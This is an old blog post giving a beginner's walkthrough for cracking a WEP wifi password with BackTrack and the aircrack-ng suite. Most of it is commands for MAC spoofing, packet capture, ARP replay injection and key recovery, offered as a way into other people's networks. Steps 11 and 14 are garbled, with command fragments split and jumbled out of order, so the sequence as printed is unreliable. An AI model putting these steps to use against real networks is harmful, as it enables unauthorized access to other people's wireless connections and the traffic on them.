Friday 17 May 2013

How to Hack Wifi easily for beginners 2013 100% working



How to Hack Wifi easily for beginners 2013

How to Hack Wifi easily for beginners 2013

Nowadays every on have wifi connection and people prefer security of their connection.
This post guides you how to hack WiFi password easily
Steps to Hack wifi password

Follow steps to Hack wi fi

Step 1:-
First Download Backtrack  from the following link:

Step 2:-
Burn the iso image on CD and boot your laptop from CD drive

Step 3:-
Select the third boot option(VESA/KDE).

Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a 
 "Konsole" window.

Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0

Step 6:-
airmon-ng stop wifi0

Step 7:-
ifconfig wifi0 down

Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-
airmon-ng start wifi0

Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,

means you some one is accessing that network and our task will be little easier. 
If not than don’t worry we will still crack it.

Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole

Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.

Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0 
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k

Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.

Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!
How to Hack Wifi easily for beginners 2013


-->
Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

2 comments: